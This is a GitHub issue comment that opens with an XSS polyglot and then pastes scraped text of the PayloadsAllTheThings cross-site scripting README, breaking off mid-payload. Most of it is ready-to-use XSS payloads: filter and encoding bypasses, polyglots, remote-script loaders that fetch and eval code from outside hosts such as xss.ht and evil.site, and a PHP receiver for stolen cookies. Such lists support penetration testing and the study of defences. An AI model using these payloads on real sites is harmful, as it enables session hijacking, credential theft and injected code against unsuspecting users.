%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

[lab-sandbox]

%0ajavascript:/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'"> %0ajavascript:/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">

Originally posted by @lab-sandbox in https://github.com/60-2balert-1-2b-60/-svg-onload-prompt-document.domain-/issues/1#issuecomment-791824497

[lab-sandbox]

Skip to content Pull requests Issues Marketplace Explore @sbakhour Learn Git and GitHub without any code!

Using the Hello World guide, you’ll start a branch, write comments, and open a pull request. swisskyrepo / PayloadsAllTheThings

1.3k 22.5k

6.6k

Code Issues 10 Pull requests Actions Projects Security

Insights

PayloadsAllTheThings/XSS Injection/ Latest commit @lapolis lapolis Added closing bracket in unicode full width bypass 6f758ba on Jan 15 Git stats

History

Files Type Name Latest commit message Commit time . . Files XSS Google Scholar Payload + Skeleton Key Persistence 10 months ago Images Fix name's capitalization 2 years ago Intruders Create 0xcela_event_handlers.txt 14 months ago README.md Added closing bracket in unicode full width bypass 2 months ago XSS in Angular.md [Update] Added 1 payload 7 months ago XSS with Relative Path Overwrite.md Fix name's capitalization 2 years ago README.md Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Summary

Exploit code or POC
    Data grabber for XSS
    UI redressing
    Javascript keylogger
    Other ways
Identify an XSS endpoint
XSS in HTML/Applications
    Common Payloads
    XSS using HTML5 tags
    XSS using a remote JS
    XSS in hidden input
    DOM based XSS
    XSS in JS Context
XSS in wrappers javascript and data URI
XSS in files (XML/SVG/CSS/Flash/Markdown)
XSS in PostMessage
Blind XSS
    XSS Hunter
    Other Blind XSS tools
    Blind XSS endpoint
Mutated XSS
Polyglot XSS
Filter Bypass and Exotic payloads
    Bypass case sensitive
    Bypass tag blacklist
    Bypass word blacklist with code evaluation
    Bypass with incomplete html tag
    Bypass quotes for string
    Bypass quotes in script tag
    Bypass quotes in mousedown event
    Bypass dot filter
    Bypass parenthesis for string
    Bypass parenthesis and semi colon
    Bypass onxxxx= blacklist
    Bypass space filter
    Bypass email filter
    Bypass document blacklist
    Bypass using javascript inside a string
    Bypass using an alternate way to redirect
    Bypass using an alternate way to execute an alert
    Bypass ">" using nothing
    Bypass "<" and ">" using ＜ and ＞
    Bypass ";" using another character
    Bypass using HTML encoding
    Bypass using Katana
    Bypass using Cuneiform
    Bypass using Lontara
    Bypass using ECMAScript6
    Bypass using Octal encoding
    Bypass using Unicode
    Bypass using UTF-7
    Bypass using UTF-8
    Bypass using UTF-16be
    Bypass using UTF-32
    Bypass using BOM
    Bypass using weird encoding or native interpretation
    Bypass using jsfuck
CSP Bypass
Common WAF Bypass

Exploit code or POC Data grabber for XSS

Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

Write the collected data into a file.

<?php $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie."\r\n"); fclose($fp); ?>

UI redressing

Leverage the XSS to modify the HTML content of the page in order to display a fake login form.

Javascript keylogger

Another way to collect sensitive data is to set a javascript keylogger.

Other ways

More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all:

Taking screenshots using XSS and the HTML5 Canvas
JavaScript Port Scanner
Network Scanner
.NET Shell execution
Redirect Form
Play Music

Identify an XSS endpoint

Tools

Most tools are also suitable for blind XSS attacks:

XSSStrike: Very popular but unfortunately not very well maintained
xsser: Utilizes a headless browser to detect XSS vulnerabilities
Dalfox: Extensive functionality and extremely fast thanks to the implementation in Go
XSpear: Similar to Dalfox but based on Ruby
domdig: Headless Chrome XSS Tester

XSS in HTML/Applications Common Payloads

// Basic payload

<scr ">

// Img payload <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')//

"><img src=x onerror=alert('XSS');> ">

// Svg payload <svgonload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))>

MOVE HERE

MOVE HERE

MOVE HERE

MOVE HERE

MOVE HERE

MOVE HERE

MOVE HERE

XSS using HTML5 tags <keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert`1`"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)> <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter> <body ontouchstart=alert(1)> // Triggers when a finger touch the screen <body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen <body ontouchmove=alert(1)> // When a finger is dragged across the screen. XSS using a remote JS <svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'> <script src=14.rs> // you can also specify an arbitrary payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain) XSS in hidden input <input type="hidden" accesskey="X" onclick="alert(1)"> Use CTRL+SHIFT+X to trigger the onclick event DOM based XSS Based on a DOM XSS sink. #"><img src=/ onerror=alert(2)> XSS in JS Context -(confirm)(document.domain)// ; alert(1);// // (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) XSS in wrappers javascript and data URI XSS with javascript: javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) We can encode the "javascript:" in Hex/Octal \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) We can use a 'newline character' java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - Horizontal tab (\t) java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) Using the newline and a comment // javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) XSS with data: data:text/html,<script>alert(0)</script> data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> XSS with vbscript: only IE vbscript:msgbox("XSS") XSS in files ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. <name> <value><![CDATA[<script>confirm(document.domain)</script>]]></value> </name> XSS in XML <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html> XSS in SVG <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> XSS in SVG (short) <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> XSS in Markdown [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:window.onerror=alert;throw%201) XSS in SWF flash application Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); more payloads in ./files XSS in SWF flash application flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%25gn=alert(1) ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf plupload.flash.swf?%#target%g=alert&uid%g=XSS& moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true video-js.swf?readyFunction=alert(1) player.swf?playerready=alert(document.cookie) player.swf?tracecall=alert(document.cookie) banner.swf?clickTAG=javascript:alert(1);// io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// XSS in CSS <!DOCTYPE html> <html> <head> <style> div { background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); background-color: #cccccc; } </style> </head> <body> <div>lol</div> </body> </html> XSS in PostMessage If the target origin is asterisk * the message can be sent to any domain has reference to the child page. <html> <body> <input type=button value="Click Me" id="btn"> </body> <script> document.getElementById('btn').onclick = function(e){ window.poc = window.open('http://www.redacted.com/#login'); setTimeout(function(){ window.poc.postMessage( { "sender": "accounts", "url": "javascript:confirm('XSS')", }, '*' ); }, 2000); } </script> </html> Blind XSS XSS Hunter Available at https://xsshunter.com/app XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. "><script src=//yoursubdomain.xss.ht></script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)') <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script> <script>$.getScript("//yoursubdomain.xss.ht")</script> Other Blind XSS tools sleepy-puppy - Netflix bXSS - LewisArdern BlueLotus_XSSReceiver - FiresunCN ezXSS - ssl Blind XSS endpoint Contact forms Ticket support Referer Header Custom Site Analytics Administrative Panel logs User Agent Custom Site Analytics Administrative Panel logs Comment Box Administrative Panel Mutated XSS Use browsers quirks to recreate some HTML tags when it is inside an element.innerHTML. Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. <noscript><p title="</noscript><img src=x onerror=alert(1)>"> Polyglot XSS Polyglot XSS - 0xsobky jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/\x3csVg/" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> Polyglot XSS - Mathias Karlsson " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// Polyglot XSS - Rsnake ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> Polyglot XSS - Daniel Miessler ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* javascript://--></title></style></textarea></script><svg "//' onclick=alert()// /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* Polyglot XSS - @s0md3v https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large <svg%0Ao%00nload=%09((pro\u006dpt))()// Polyglot XSS - from @filedescriptor's Polyglot Challenge # by crlf javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> # by europa javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> # by EdOverflow javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> # by h1/ragnar javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` Filter Bypass and exotic payloads Bypass case sensitive <sCrIpt>alert(1)</ScRipt> Bypass tag blacklist <script x> <script x>alert('XSS')<script y> Bypass word blacklist with code evaluation eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```; Bypass with incomplete html tag Works on IE/Firefox/Chrome/Safari <img src='1' onerror='alert(0)' < Bypass quotes for string String.fromCharCode(88,83,83) Bypass quotes in script tag http://localhost/bla.php?test=</script><script>alert(1)</script> <html> <script> <?php echo 'foo="text '.$_GET['test'].'";';`?> </script> </html> Bypass quotes in mousedown event You can bypass a single quote with ' in an on mousedown event handler <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> Bypass dot filter <script>window['alert'](document['domain'])</script> Convert IP address into decimal format: IE. http://192.168.1.1 == http://3232235777 http://www.geektools.com/cgi-bin/ipconv.cgi Bypass parenthesis for string alert`1` setTimeout`alert\u0028document.domain\u0029`; Bypass parenthesis and semi colon // From @garethheyes <script>onerror=alert;throw 1337</script> <script>{onerror=alert}throw 1337</script> <script>throw onerror=alert,'some string',123,'haha'</script> // From @terjanq <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> // From @cgvwzq <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> Bypass onxxxx= blacklist <object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)> // Bypass onxxx= filter with a null byte/vertical tab <img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) /> // Bypass onxxx= filter with a '/' <img src='1' onerror/=alert(0) /> Bypass space filter // Bypass space filter with "/" <img/src='1'/onerror=alert(0)> // Bypass space filter with 0x0c/^L <svgonload=alert(1)> $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al 00000010: 6572 7428 3129 0c3e 0a ert(1).>. Bypass email filter (RFC compliant) "><svg/onload=confirm(1)>"@x.y Bypass document blacklist <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> Bypass using javascript inside a string <script> foo="text </script><script>alert(1)</script>"; </script> Bypass using an alternate way to redirect location="http://google.com" document.location = "http://google.com" document.location.href="http://google.com" window.location.assign("http://google.com") window['location']['href']="http://google.com" Bypass using an alternate way to execute an alert From @brutelogic tweet. window['alert'](0) parent['alert'](1) self['alert'](2) top['alert'](3) this['alert'](4) frames['alert'](5) content['alert'](6) [7].map(alert) [8].find(alert) [9].every(alert) [10].filter(alert) [11].findIndex(alert) [12].forEach(alert); From @theMiddle - Using global variables The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its index number instead the function name. c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } // 5 Then calling alert is : Object.keys(self)[5] // "alert" self[Object.keys(self)[5]]("1") // alert("1") We can find "alert" with a regular expression like ^a[rel]+t$ : a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() // then you can use a() with Object.keys self[Object.keys(self)[a()]]("1") // alert("1") Oneliner: a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") From @quanyang tweet. prompt`${document.domain}` document.location='java\tscript:alert(1)' document.location='java\rscript:alert(1)' document.location='java\tscript:alert(1)' From @404death tweet. eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; constructor.constructor("aler"+"t(3)")(); [].filter.constructor('ale'+'rt(4)')(); top["al"+"ert"](5); top[8680439..toString(30)](7); top[/al/.source+/ert/.source](8); top['al\x65rt'](9); open('java'+'script:ale'+'rt(11)'); location='javascript:ale'+'rt(12)'; setTimeout`alert\u0028document.domain\u0029`; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```; Bypass using an alternate way to trigger an alert var i = document.createElement("iframe"); i.onload = function(){ i.contentWindow.alert(1); } document.appendChild(i); // Bypassed security XSSObject.proxy = function (obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function () { if (exec_original) { return proxy.apply(this, arguments); } }; XSSObject.lockdown(obj, name); }; XSSObject.proxy(window, 'alert', 'window.alert', false); Bypass ">" using nothing You don't need to close your tags. <svg onload=alert(1)// Bypass "<" and ">" using ＜ and ＞ Unicode Character U+FF1C and U+FF1E ＜script/src=//evil.site/poc.js＞ Bypass ";" using another character 'te' * alert('*') * 'xt'; 'te' / alert('/') / 'xt'; 'te' % alert('%') % 'xt'; 'te' - alert('-') - 'xt'; 'te' + alert('+') + 'xt'; 'te' ^ alert('^') ^ 'xt'; 'te' > alert('>') > 'xt'; 'te' < alert('<') < 'xt'; 'te' == alert('==') == 'xt'; 'te' & alert('&') & 'xt'; 'te' , alert(',') , 'xt'; 'te' | alert('|') | 'xt'; 'te' ? alert('ifelsesh') : 'xt'; 'te' in alert('in') in 'xt'; 'te' instanceof alert('instanceof') instanceof 'xt'; Bypass using HTML encoding %26%2397;lert(1) &#97;&#108;&#101;&#114;&#116; ></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> Bypass using Katana Using the Katakana library. javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() Bypass using Cuneiform 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() Bypass using Lontara ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")() More alphabets on http://aem1k.com/aurebesh.js/# Bypass using ECMAScript6 <script>alert&DiacriticalGrave;1&DiacriticalGrave;</script> Bypass using Octal encoding javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' Bypass using Unicode Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %EF%BC%9E becomes > %EF%BC%9C becomes < Bypass using Unicode converted to uppercase İ (%c4%b0).toLowerCase() => i ı (%c4%b1).toUpperCase() => I ſ (%c5%bf) .toUpperCase() => S K (%E2%84%AA).toLowerCase() => k <ſvg onload=... > become <SVG ONLOAD=...> <ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=> Bypass using UTF-7 +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- Bypass using UTF-8 < = %C0%BC = %E0%80%BC = %F0%80%80%BC > = %C0%BE = %E0%80%BE = %F0%80%80%BE ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 " = %CA%BA ' = %CA%B9 Bypass using UTF-16be %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> Bypass using UTF-32 %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E Bypass using BOM Byte Order Mark (The page must begin with the BOM character.) BOM character allows you to override charset of the page BOM Character for UTF-16 Encoding: Big Endian : 0xFE 0xFF Little Endian : 0xFF 0xFE XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E BOM Character for UTF-32 Encoding: Big Endian : 0x00 0x00 0xFE 0xFF Little Endian : 0xFF 0xFE 0x00 0x00 XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E Bypass using weird encoding or native interpretation <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[